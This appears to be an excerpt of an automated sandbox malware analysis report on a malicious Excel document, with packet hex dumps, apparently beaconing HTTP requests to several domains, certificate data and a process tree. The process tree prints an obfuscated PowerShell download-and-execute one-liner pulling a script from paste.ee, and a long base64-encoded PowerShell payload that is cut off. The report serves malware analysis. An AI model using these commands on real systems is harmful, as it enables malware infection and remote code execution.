                                                                                                                                                  Mar 22, 2021 12:39:50.884977102 CET7664INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
                                                                                                                                                  Mar 22, 2021 12:39:50.884998083 CET7665INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
                                                                                                                                                  Mar 22, 2021 12:39:50.885019064 CET7666INData Raw: 8d 55 dc 52 8b 55 08 8d 45 ec 50 51 52 e8 29 22 00 00 83 c4 10 33 c0 85 f6 74 11 2b df 8a 4c 05 dc 32 0f 40 88 0c 3b 47 3b c6 72 f1 5e 5f 5b 8b e5 5d c3 65 b7 5f 00 ff 4e ad 19 55 8b ec 83 ec 10 53 56 57 8b f9 8b 4d 08 8b f2 83 f9 0c 75 24 8b f1
                                                                                                                                                  Data Ascii: URUEPQR)"3t+L2@;G;r^_[]e_NUSVWMu$+3IN@;_G_^[]3Q_P_V_EUEjEPV]]]UMt_^[]x[UtmUPUP
                                                                                                                                                  Mar 22, 2021 12:39:50.885041952 CET7668INData Raw: e4 fb ff ff 69 27 27 4e c7 85 e8 fb ff ff cd b2 b2 7f c7 85 ec fb ff ff 9f 75 75 ea c7 85 f0 fb ff ff 1b 09 09 12 c7 85 f4 fb ff ff 9e 83 83 1d c7 85 f8 fb ff ff 74 2c 2c 58 c7 85 fc fb ff ff 2e 1a 1a 34 c7 85 00 fc ff ff 2d 1b 1b 36 c7 85 04 fc
                                                                                                                                                  Data Ascii: i''Nuut,,X.4-6nnZZ[RRM;;va} {))R$>(q//^,0SS4h8<,@` @D
                                                                                                                                                  Mar 22, 2021 12:39:50.885065079 CET7669INData Raw: c7 85 fc fd ff ff 72 2e 2e 5c c7 85 00 fe ff ff 24 1c 1c 38 c7 85 04 fe ff ff f1 a6 a6 57 c7 85 08 fe ff ff c7 b4 b4 73 c7 85 0c fe ff ff 51 c6 c6 97 c7 85 10 fe ff ff 23 e8 e8 cb c7 85 14 fe ff ff 7c dd dd a1 c7 85 18 fe ff ff 9c 74 74 e8 c7 85
                                                                                                                                                  Data Ascii: r..\$8WsQ#|tt!> KK$a(,0pp4B>>|8q<ff@HHDHLPaaT_55jXWW\
                                                                                                                                                  Mar 22, 2021 12:39:50.885088921 CET7670INData Raw: 2e 34 c7 85 14 f8 ff ff a0 55 f3 a2 c7 85 18 f8 ff ff 32 e1 8a 05 c7 85 1c f8 ff ff 75 eb f6 a4 c7 85 20 f8 ff ff 39 ec 83 0b c7 85 24 f8 ff ff aa ef 60 40 c7 85 28 f8 ff ff 06 9f 71 5e c7 85 2c f8 ff ff 51 10 6e bd c7 85 30 f8 ff ff f9 8a 21 3e
                                                                                                                                                  Data Ascii: .4U2u 9$`@(q^,Qn0!>4=8><FM@TD]qHoLP`P$TXC@\wg`Bdh8[lypG|
                                                                                                                                                  Mar 22, 2021 12:39:50.885116100 CET7672INData Raw: 0e 50 cd 7f c7 85 2c fa ff ff 2f f6 91 17 c7 85 30 fa ff ff 8d d6 4d 76 c7 85 34 fa ff ff 4d b0 ef 43 c7 85 38 fa ff ff 54 4d aa cc c7 85 3c fa ff ff df 04 96 e4 c7 85 40 fa ff ff e3 b5 d1 9e c7 85 44 fa ff ff 1b 88 6a 4c c7 85 48 fa ff ff b8 1f
                                                                                                                                                  Data Ascii: P,/0Mv4MC8TM<@DjLH,LQeFP^T]5Xst\.A`ZgdRh3VlGmpatz7xY|<'5a
                                                                                                                                                  Mar 22, 2021 12:39:50.885139942 CET7673INData Raw: 08 81 e7 00 ff 00 ff c1 c6 08 81 e6 ff 00 ff 00 0b fe 89 7a 0c 8b 71 10 8b fe c1 cf 08 81 e7 00 ff 00 ff c1 c6 08 81 e6 ff 00 ff 00 0b fe 89 7a 10 8b 71 14 8b fe c1 cf 08 81 e7 00 ff 00 ff c1 c6 08 81 e6 ff 00 ff 00 0b fe 89 7a 14 8b 71 18 8b fe
                                                                                                                                                  Data Ascii: zqzqzqzI}ru3]xL3T3T3
                                                                                                                                                  Mar 22, 2021 12:39:50.934123993 CET7675INData Raw: 8b 5d fc c1 fb 18 81 e3 ff 00 00 00 33 74 98 04 8b 5d f0 33 71 14 89 7d f8 c1 ff 10 81 e7 ff 00 00 00 8b 7c b8 04 c1 fb 08 c1 cf 08 81 e3 ff 00 00 00 8b 5c 98 04 c1 cb 10 33 fb 8b 5d fc 81 e3 ff 00 00 00 8b 5c 98 04 c1 c3 08 33 fb 8b 5d ec c1 fb
                                                                                                                                                  Data Ascii: ]3t]3q}|\3]\3]3|3y}}\}|3}|3}3\ 3YM]|\3]


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  2192.168.2.34975834.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Mar 22, 2021 12:40:42.672624111 CET9433OUTGET /w8en/?q6A=Ffktffp0pJmTzz&Dz=SghAdDp/cBBqHtwO7kpINEDEOwN5s0udgp1UmetwbAdBKH2/rJggP1HdksgR9LE8HJ+i HTTP/1.1
                                                                                                                                                  Host: www.thesongwriterschool.com
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
                                                                                                                                                  Mar 22, 2021 12:40:42.812581062 CET9433INHTTP/1.1 403 Forbidden
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Mon, 22 Mar 2021 11:40:42 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 275
                                                                                                                                                  ETag: "605504c2-113"
                                                                                                                                                  Via: 1.1 google
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  3192.168.2.349759162.241.216.11380C:\Windows\explorer.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Mar 22, 2021 12:40:48.184408903 CET9434OUTGET /w8en/?Dz=UkYqCOmDirKbZ6r6AMi5nYMGDuAEHfzDYA/cukhS4kI/uiLj0Ql+Qa4cH3YmUjIY4xUZ&q6A=Ffktffp0pJmTzz HTTP/1.1
                                                                                                                                                  Host: www.anastasiamatkovskia.com
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
                                                                                                                                                  Mar 22, 2021 12:40:49.329710960 CET9436INHTTP/1.1 404 Not Found
                                                                                                                                                  Date: Mon, 22 Mar 2021 11:40:49 GMT
                                                                                                                                                  Server: nginx/1.19.5
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                  Link: <http://www.anastasiamatkovskia.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                                                  X-Endurance-Cache-Level: 2
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Data Raw: 31 34 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 0d 0a 09 09 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 7c 20 41 6e 61 73 74 61 73 69 61 20 4d 61 74 6b 6f 76 73 6b 69 61 09 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 6e 61 73 74 61 73 69 61 6d 61 74 6b 6f 76 73 6b 69 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 65 73 73 69 76 65 2f 6a 73 2f 68 74 6d 6c 35 2f 64 69 73 74 2f 68 74 6d 6c 35 73 68 69 76 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 63 73 73 33 2d 6d 65 64 69 61 71 75 65 72 69 65 73 2d 6a 73 2e 67 6f 6f 67 6c 65 63 6f 64 65 2e 63 6f 6d 2f 73 76 6e 2f 74 72 75 6e 6b 2f 63 73 73 33 2d 6d 65 64 69 61 71 75 65 72 69 65 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 6e 61 73 74 61 73 69 61 6d 61 74 6b 6f 76 73 6b 69 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 65 73 73 69 76 65 2f 63 73 73 2f 69 65 38 2e 63 73 73 22 2f 3e 0d 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 6e 61 73 74 61 73 69 61 6d 61 74 6b 6f 76 73 6b 69 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 65 73 73 69 76 65 2f 63 73 73 2f 69 65 37 2e 63 73 73 22 2f 3e 0d 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 2f 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 0d 0a 09 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 65 63 75 72 65 2e 67 72 61 76 61 74 61 72 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65
                                                                                                                                                  Data Ascii: 1499<!DOCTYPE html><html lang="en-US"><head><title>Page not found | Anastasia Matkovskia</title>...[if lt IE 9]><script src="http://www.anastasiamatkovskia.com/wp-content/themes/pressive/js/html5/dist/html5shiv.js"></script><script src="//css3-mediaqueries-js.googlecode.com/svn/trunk/css3-mediaqueries.js"></script><![endif]-->...[if IE 8]><link rel="stylesheet" type="text/css" href="http://www.anastasiamatkovskia.com/wp-content/themes/pressive/css/ie8.css"/><![endif]-->...[if IE 7]><link rel="stylesheet" type="text/css" href="http://www.anastasiamatkovskia.com/wp-content/themes/pressive/css/ie7.css"/><![endif]--><meta name="viewport" content="width=device-width, initial-scale=1.0"/><meta charset="UTF-8"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//secure.gravatar.com' /><link rel='dns-prefetch' hre
                                                                                                                                                  Mar 22, 2021 12:40:49.329797029 CET9437INData Raw: 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 76 30 2e 77 6f 72 64 70 72 65 73 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27
                                                                                                                                                  Data Ascii: f='//s.w.org' /><link rel='dns-prefetch' href='//v0.wordpress.com' /><link rel='dns-prefetch' href='//i0.wp.com' /><link rel='dns-prefetch' href='//i1.wp.com' /><link rel='dns-prefetch' href='//i2.wp.com' /><script type="text/javascript
                                                                                                                                                  Mar 22, 2021 12:40:49.329866886 CET9438INData Raw: 30 33 2c 35 35 33 35 36 2c 35 36 38 31 39 5d 29 26 26 21 73 28 5b 35 35 33 35 36 2c 35 37 33 33 32 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 35 36 31 32 38 2c 35 36 34 31 38 2c 35 36 31 32 38 2c 35 36 34 32 31 2c 35 36 31 32 38 2c 35 36 34 33 30 2c
                                                                                                                                                  Data Ascii: 03,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!
                                                                                                                                                  Mar 22, 2021 12:40:49.329938889 CET9440INData Raw: 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 20 68 72 65
                                                                                                                                                  Data Ascii: g: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://www.anastasiamatkovskia.com/wp-includes/css/dist/block-library/style.min.css?ver=5.7' type='text/css' media='all' /><style id='wp-block-library-inline
                                                                                                                                                  Mar 22, 2021 12:40:49.329978943 CET9440INData Raw: 70 3a 2f 2f 77 77 77 2e 61 6e 61 73 74 61 73 69 61 6d 61 74 6b 6f 76 73 6b 69 61 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 45 64 69 74 55 52 49 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f
                                                                                                                                                  Data Ascii: p://www.anastasiamatkovskia.com/wp-json/" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.anastasiamatkovskia.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.anas
                                                                                                                                                  Mar 22, 2021 12:40:49.330030918 CET9442INData Raw: 32 36 35 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 69 64 3d 22 74 76 65 5f 67 6c 6f 62 61 6c 5f 76 61 72 69 61 62 6c 65 73 22 3e 3a 72 6f 6f 74 7b 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 27
                                                                                                                                                  Data Ascii: 265<style type="text/css" id="tve_global_variables">:root{}</style><style type='text/css'>img#wpstats{display:none}</style><style type="text/css">.wp-video-shortcode {max-width: 100% !important;}body { background:#191b30; }.cnt
                                                                                                                                                  Mar 22, 2021 12:40:49.330070972 CET9442INData Raw: 2e 62 53 65 20 68 34 2c 20 2e 62 2d 74 74 20 68 34 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 61 6c 65 77 61 79 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0d 0a 32 36 0d 0a 2e 62 53 65 20 68 34 2c 20 2e 62 2d 74 74 20 68 34 20 7b 66 6f 6e 74 2d 77 65
                                                                                                                                                  Data Ascii: .bSe h4, .b-tt h4{font-family:Raleway,sans-serif;}26.bSe h4, .b-tt h4 {font-weight: bold;}58.bSe h5, .b-tt h5{font-family:Raleway,sans-serif;}.bSe h5, .b-tt h5 {font-weight: bold;}58.bSe h6, .b-tt h6{font-family:Raleway,sans-serif;
                                                                                                                                                  Mar 22, 2021 12:40:49.345158100 CET9443INData Raw: 39 35 66 0d 0a 23 74 65 78 74 5f 6c 6f 67 6f 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 61 6c 65 77 61 79 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 23 74 65 78 74 5f 6c 6f 67 6f 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 7d 2e 63 6e
                                                                                                                                                  Data Ascii: 95f#text_logo{font-family:Raleway,sans-serif;}#text_logo {font-weight: bold;}.cnt article h1 a { font-weight:700; }.bSe h1, .b-tt h1 { font-weight:700; }.bSe h2, .b-tt h2 { font-weight:700; }.bSe h3, .b-tt h3 { font-weight:700; }.bSe h4, .b-
                                                                                                                                                  Mar 22, 2021 12:40:49.345216036 CET9445INData Raw: 2e 68 2d 63 74 61 20 3e 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 66 66 62 61 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 68 65 61 64 65 72 20 75 6c 2e 6d 65 6e 75 20 3e 20 6c 69 2e 68 2d 63 74 61 20 3e 20 61 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a
                                                                                                                                                  Data Ascii: .h-cta > a { color:#ffba00!important; }header ul.menu > li.h-cta > a { background:#transparent; }header ul.menu > li.h-cta > a { border-color:#ffba00; }header ul.menu > li.h-cta > a:hover { color:#FFFFFF!important; }header ul.menu > li.h-cta >
                                                                                                                                                  Mar 22, 2021 12:40:49.352520943 CET9446INData Raw: 31 30 32 32 0d 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 70 61 67 65 73 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 75 6c 20 69 64 3d 22 6d 65 6e 75 2d 70 61 67 65 73 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 22 3e 3c 6c 69 20 20 69 64 3d 22
                                                                                                                                                  Data Ascii: 1022<nav class="menu-pages-container"><ul id="menu-pages" class="menu"><li id="menu-item-40" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home toplvl"><a href="http://www.anastasiamatkovskia.com/">Home</a></li>


                                                                                                                                                  HTTPS Packets

                                                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                  Mar 22, 2021 12:39:15.771718025 CET104.21.45.223443192.168.2.349744CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Aug 06 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Fri Aug 06 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                                                                  CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  Analysis Process: EXCEL.EXE PID: 4228 Parent PID: 792

                                                                                                                                                  General

                                                                                                                                                  Start time:12:38:45
                                                                                                                                                  Start date:22/03/2021
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                  Imagebase:0x840000
                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: powershell.exe PID: 4544 Parent PID: 4228

                                                                                                                                                  General

                                                                                                                                                  Start time:12:38:50
                                                                                                                                                  Start date:22/03/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')
                                                                                                                                                  Imagebase:0x140000
                                                                                                                                                  File size:430592 bytes
                                                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: conhost.exe PID: 4548 Parent PID: 4544

                                                                                                                                                  General

                                                                                                                                                  Start time:12:38:50
                                                                                                                                                  Start date:22/03/2021
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6b2800000
                                                                                                                                                  File size:625664 bytes
                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: powershell.exe PID: 6204 Parent PID: 4544

                                                                                                                                                  General

                                                                                                                                                  Start time:12:39:16
                                                                                                                                                  Start date:22/03/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -w 1 /e RgB1AG4AYwB0AGkAbwBuACAAZABSAGgAVQBYAG0AWQBIAFkAbgBPAEkAWgB3AHYAWgBHAEYAbQBGAFYAQwBqAGwARgBOAGQAcAB6AGgAYgBJAGQATABqAGoAewAgAHAAYQByAGEAbQAoACQAaABvAHIAcABBAFIAZwAgACwAIAAkAE4AWgBtAEwAYwBBAHEASQBTAFgAZwAgACwAIAAkAHQAcgBXAFIAdgBLAEsAbABHAHEASgBDAG8AawBJAHcAVQBSAFoAWABlAGcAZwBMAGcAQQBRAEUAUgBDAGcAdgBwACAALAAgACQATgBxAFIAWgB1AHEASAB1AEYAVwBQAGsAWAByAHMAdQBuAEIAeABKAEoATgBMAEwAbAB1AHQARgBVAEUASgBPAE4AQQAgACwAIAAkAFMAZQB2AFgAagBRAGoAYQBKAHYAdwBkAFoATQBXAE8AZgB4AGYAZgBBACAALAAgACQARgBvAHoAdwBCAGEAQgBOAEEAWABYAFQAYQBRAHMAZABPAHQAWgBtAEIAUQBvAFIAVQB0AHgAKQANAAoAJABDAHcAbgBzAGwARgBhAGYAUQBNAEUAVgBQAEwAUABIAHIAVQBiAGkAdwBQAEoASgBpAEgAcQBNAEcAZgBPAE4ATABqAEQAIAA9ACAAJwB5AE4AawB3AEkARwBwAEIAWgAnADsADQAKACQAagBXAE0AQQBsAHEASABCAHQAbQBtAGUASgBkAFAATwBZAGsAIAA9ACAAJwByAEoAZgBIAEYASQBkAGsAZgBaAHAAYQBJAGoATgBYAFQAegBGAHUAWABHAEsAcQBSAFgAVQBFAEcAZwB1AGgARQBEAGgATABFAE8ARwBzAEgARwAnADsADQAKACQAYgBEAE0AZAB1AHYARgB2AE8AVABxAGEAbAB5AG8AcQBpAG4AWgBkAHkAZgBJAFYAIAA9ACAAJwBDAEMAVABFAHQATgAnADsADQAKACQAUgBlAGkAbQBFAHQAYQBJAEEAbABmAE8ATgBkAHcATQBQAFkAWABFAGgAYwBkAHcAdgBxAFkAcgB0AG0AcQBVAEcAIAA9ACAAJwBJAEcAUABDAG0AJwA7AA0ACgAkAE4AUgBjAE4AegB1AEkAYwBHAHAARABnAFcASQBFAHAAQgBsAHIATgBWAGkAUABPAHUATABJAEoAVgBwAHcATgBtAGgAcgAgAD0AIAAnAHoAUAB4AEIAaQB3AGwARABpAEsAeQB4AHoAUwBGACcAOwANAAoAJABLAFkAVQBlAEMATwBTAG4AbQB5AEgAUQBzAHEAdQBvAFIAbgBxAGwAbwBwAGUAWgB3AEwAIAA9ACAAJwBrAE0ASwBLAEMAagBTAEMATgBOAE0ATwBrAHgASgBQAGsAbwBWAEwAcwBQAEoAZgBMAGIAVABxACcAOwANAAoAJAB1AHYAaABxAGgAaABiAGIAbwBFAGcAWgBuAGcAYgBGAFoARgAgAD0AIAAnAGUAYQB1AGsAYgBBAG8AVQBDAGYAeQBhAFEAYwBoAFMAUgBlAFgARABQAGkAbwB2AGsAbwBsAEYAagBpAGEAbABXAGYAJwA7AA0ACgAkAHUAQQBMAEcAcQB0AE0AWQB3AHEAZAAgAD0AIAAnAHgARgBPAEoAYQBCAEMAWgB2AG0AeQBBAG4AUABqACcAOwANAAoAJABVAEUATQBFAGsAUQBuAFMARwBZAGgASgBDAEsAcwBGAEcAWABvAHoAVgBaAEEAawBUAEcAUQBJAEIATABUAGIAIAA9ACAAJwBiAEQAcgBkAFoAZgBnAFMAdgBDACcAOwANAAoAJABVAHQAVwAgAD0AIAAnAHUAcwB0AFAAYQBqAFEAdQBFAGMAawBlAEEAZQBRAHYARgBHAHkAYgBHAEEAYwBnAHIASABoAFoAWAB5AFAAJwA7AA0ACgAkAGoAZgBPAEkAUgBEAEEAYgBLAEoAbgBCAHAAQgBnAG4AZgBHAHcATgB1AHYAZQAgAD0AIAAnAFEATQBYAFQAQwByAFgARgBNAEoAdgBVAFEASABlAEIARwBYAFEAeABOAGIAcgBxAGIAdAB1AFEAQwBDAGcAbgBCAFUAcwBFAGcAaAAnADsADQAKAH0ADQAKACQAVABsAGgAbwBmAEYATABYAFgAYwB1AEgAWABmAGcAZwBwAFYAZwByAEkAeAAgAD0AIAAnAEQASwBkAEkAUwB2AFAAJwA7AA0ACgBJAGYAIAAoACcAVgBaAHkAeABMAGcAbQBNAGsAUQBXAFcAbwBIAHUASQBIAFUAbwBDAGoAegAnACAALQBlAHEAIAA